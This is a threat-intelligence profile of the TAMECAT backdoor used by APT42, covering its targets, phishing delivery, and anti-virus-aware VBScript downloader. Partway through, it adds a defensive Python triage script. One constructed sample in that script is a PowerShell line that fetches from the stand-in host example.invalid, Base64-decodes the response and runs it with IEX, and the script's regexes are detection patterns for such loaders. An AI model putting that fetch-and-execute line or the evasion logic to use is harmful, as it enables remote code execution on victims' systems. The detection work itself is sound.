
Tamecat (Backdoor) – Malware

July 12, 2024

Tamecat

Type of Malware

Backdoor

Country of Origin

Iran

Date of initial activity

March 2024

Targeted Countries

Regions of interest to Iran

Associated Groups

APT42

Motivation

Threat actors may use TAMECAT to access files, directories, applications, and more. With this access they can extract a wide range of sensitive information, including personal data, financial records, login credentials, and other valuable data. Additionally, threat actors may use TAMECAT to deploy additional malware onto the compromised systems.

Attack Vectors

Malicious links from typo-squatted domains masquerading as news articles, likely sent via spear phishing, that redirect the user to fake Google login pages.

Tools

ExpressVPN nodes, Cloudflare-hosted domains, and ephemeral VPS servers

Targeted System

Windows

Overview

In March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold capable of executing arbitrary PowerShell or C# content. TAMECAT is delivered by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant previously observed TAMECAT being used in a large-scale APT42 spear-phishing campaign targeting individuals or entities employed by or affiliated with NGOs, governments, or intergovernmental organizations worldwide.

Targets

Credentials of journalists, researchers, and geopolitical entities in regions of interest to Iran; individuals or entities employed by or affiliated with NGOs, governments, or intergovernmental organizations around the world.

How they operate

APT42 utilizes two custom backdoors named NICECURL and TAMECAT, each designed for specific functions within its cyberespionage operations. The attack begins with emails from online personas posing as journalists, NGO representatives, or event organizers, sent from domains that “typosquat” (closely mimic) the domains of legitimate organizations. TAMECAT is delivered with decoy content, likely via spear phishing, providing APT42 operators with initial access to the targets. The backdoor offers a flexible code-execution interface, which can be used as a jumping-off point to deploy additional malware or manually execute commands on the device. TAMECAT is dropped by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Execution begins with a small VBScript downloader that uses Windows Management Instrumentation (WMI) to query the anti-virus products running on the victim’s system. Depending on whether the script detects Windows Defender, different download commands and URLs are used.
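The loader shape described above (WMI anti-virus enumeration, a Windows Defender branch, an HTTP fetch, and Base64-decoded payload) can be turned into a triage heuristic for logged script content. The following is an added example and not code from Mandiant or the original post; the script-block samples are constructed, and the `root\SecurityCenter2` / `AntiVirusProduct` WMI names are the standard Windows anti-virus enumeration query assumed here, not a detail stated on the page.

```python
import re

# Constructed script-block samples modelled on the page's description of the
# TAMECAT loader. They are illustrative, not real captured samples.
SAMPLE_BLOCKS = {
    "benign-inventory": (
        'Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct '
        '| Select-Object displayName, productState'
    ),
    "suspicious-loader": (
        '$av = Get-WmiObject -Namespace root\\SecurityCenter2 -Class AntiVirusProduct; '
        'if ($av.displayName -match "Windows Defender") { $u = "http://example.invalid/a" } '
        'else { $u = "http://example.invalid/b" }; '
        '$d = (New-Object Net.WebClient).DownloadString($u); '
        'IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))'
    ),
    "benign-update": (
        'Invoke-WebRequest -Uri https://example.invalid/setup.msi -OutFile C:\\Temp\\setup.msi'
    ),
}

# Indicator name -> case-insensitive regex over the script text.
INDICATORS = {
    "wmi_av_enum": r"(Get-WmiObject|Get-CimInstance|winmgmts:).*?(AntiVirusProduct|SecurityCenter2)",
    "defender_branch": r"Windows Defender",
    "http_download": r"(DownloadString|DownloadFile|Invoke-WebRequest|WebClient|XMLHTTP)",
    "base64_decode": r"FromBase64String",
    "dynamic_exec": r"(\bIEX\b|Invoke-Expression)",
}

def match_indicators(script_text):
    """Return the sorted list of indicator names present in one script block."""
    return sorted(name for name, rx in INDICATORS.items()
                  if re.search(rx, script_text, re.IGNORECASE | re.DOTALL))

def is_tamecat_like(hits):
    """Flag only the combination: AV enumeration plus an HTTP fetch plus either
    Base64 decoding or dynamic execution. A lone AV inventory query or a lone
    download (both common admin activity) is not flagged."""
    return ("wmi_av_enum" in hits and "http_download" in hits
            and ("base64_decode" in hits or "dynamic_exec" in hits))

def triage(blocks):
    """Map each block name to (indicator hits, flagged?)."""
    out = {}
    for name, text in blocks.items():
        hits = match_indicators(text)
        out[name] = (hits, is_tamecat_like(hits))
    return out

if __name__ == "__main__":
    for name, (hits, flagged) in triage(SAMPLE_BLOCKS).items():
        print(f"{name}: {'FLAG' if flagged else 'ok'} {hits}")
```

In practice the block text would come from PowerShell script-block logging rather than the inline samples, and the verdict is a triage hint to be confirmed against the C2 traffic, not a signature.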

References:
  • Uncharmed: Untangling Iran’s APT42 Operations
  • How to remove TAMECAT malware from infected computers